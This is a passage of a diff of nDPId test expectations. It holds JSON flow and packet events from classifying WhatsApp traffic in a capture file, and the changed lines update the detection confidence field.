00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1655056441533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655056441533,"pkt":"eJS0JASgYDjgxTWgCABFAAA8SQJAAD8GuU\/AqAJkszzDIbkAFGYVt3HxAAAAAKAC\/\/87QgAAAgQFtAQCCAoFcXjRAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1655056441563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655056441563,"pkt":"eJS0JASgYDjgxTWgCABFAAA0SQNAAD8GuVbAqAJkszzDIbkAFGYVt3Hym+tfO4AQAKzuQwAAAQEICgVxePCucNFZ"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1655056441564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655056441564,"pkt":"eJS0JASgYDjgxTWgCABFAAA4SQRAAD8GuVHAqAJkszzDIbkAFGYVt3Hym+tfO4AYAKyo8gAAAQEICgVxePCucNFZRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655056441533,"flow_last_seen":1655056441565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655056441565,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655056441533,"flow_last_seen":1655056441565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655056441565,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":233,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":233,"packets-processed":232,"total-skipped-flows":0,"total-l4-payload-len":19681,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":29,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":29,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":187,"global_ts_msec":1655059510580} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655059510580,"flow_last_seen":1655059510580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655059510580,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1655059510580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655059510580,"pkt":"eJS0JASgYDjgxTWgCABFAAA8GcJAAD8G6I\/AqAJkszzDIZuUFGY95P\/EAAAAAKAC\/\/\/fxAAAAgQFtAQCCAoFoDuLAAAAAAEDAwk="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1655059510610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655059510610,"pkt":"eJS0JASgYDjgxTWgCABFAAA0GcNAAD8G6JbAqAJkszzDIZuUFGY95P\/FCFqhLIAQAKyMSwAAAQEICgWgO6lMbYt5"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1655059510610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655059510610,"pkt":"eJS0JASgYDjgxTWgCABFAAA4GcRAAD8G6JHAqAJkszzDIZuUFGY95P\/FCFqhLIAYAKxG+gAAAQEICgWgO6lMbYt5RUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655059510580,"flow_last_seen":1655059510611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655059510611,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655051492307,"flow_last_seen":1655051493108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655051220512,"flow_last_seen":1655051220729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655051794002,"flow_last_seen":1655051794206,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655049443230,"flow_last_seen":1655049443593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655050704430,"flow_last_seen":1655050704962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655059510580,"flow_last_seen":1655059510611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655059510611,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655051492307,"flow_last_seen":1655051493108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655051220512,"flow_last_seen":1655051220729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655051794002,"flow_last_seen":1655051794206,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655049443230,"flow_last_seen":1655049443593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655050704430,"flow_last_seen":1655050704962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":241,"packets-processed":240,"total-skipped-flows":0,"total-l4-payload-len":20954,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":30,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":30,"total-idle-flows":23,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":198,"global_ts_msec":1655060495977} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655060495977,"flow_last_seen":1655060495977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655060495977,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1655060495977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655060495977,"pkt":"eJS0JASgYDjgxTWgCABFAAA8YJ5AAD8GobPAqAJkszzDIZysFGYCJGGJAAAAAKAC\/\/+p9wAAAgQFtAQCCAoFq0oxAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1655060496008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655060496008,"pkt":"eJS0JASgYDjgxTWgCABFAAA0YJ9AAD8GobrAqAJkszzDIZysFGYCJGGK2sw1x4AQAKwONAAAAQEICgWrSlDEovR\/"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1655060496009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655060496009,"pkt":"eJS0JASgYDjgxTWgCABFAAA4YKBAAD8GobXAqAJkszzDIZysFGYCJGGK2sw1x4AYAKzI4QAAAQEICgWrSlHEovR\/RUQAAQ=="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655060495977,"flow_last_seen":1655060496009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655060496009,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052148615,"flow_last_seen":1655052148966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052853504,"flow_last_seen":1655052853872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052438619,"flow_last_seen":1655052438807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655060495977,"flow_last_seen":1655060496009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655060496009,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":40108,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052148615,"flow_last_seen":1655052148966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052853504,"flow_last_seen":1655052853872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655052438619,"flow_last_seen":1655052438807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655060496256,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":250,"packets-processed":249,"total-skipped-flows":0,"total-l4-payload-len":22271,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":31,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":31,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":207,"global_ts_msec":1655061657436} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655061657436,"flow_last_seen":1655061657436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655061657436,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1655061657436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655061657436,"pkt":"eJS0JASgYDjgxTWgCABFAAA88nlAAD8GD8jAqAJkszzDMauyFGbsqzKiAAAAAKAC\/\/9iSAAAAgQFtAQCCAo4IpSyAAAAAAEDAwk="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1655061657568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655061657568,"pkt":"eJS0JASgYDjgxTWgCABFAAA08npAAD8GD8\/AqAJkszzDMauyFGbsqzKjnK08DIAQAIBE+AAAAQEICjgilXAR0WBF"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1655061657568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655061657568,"pkt":"eJS0JASgYDjgxTWgCABFAAA48ntAAD8GD8rAqAJkszzDMauyFGbsqzKjnK08DIAYAID\/ogAAAQEICjgilXQR0WBFRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655061657436,"flow_last_seen":1655061657706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655061657706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":258,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655053633670,"flow_last_seen":1655053633932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655061657966,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655061657436,"flow_last_seen":1655061657706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655061657706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43954,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":258,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655053633670,"flow_last_seen":1655053633932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655061657966,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
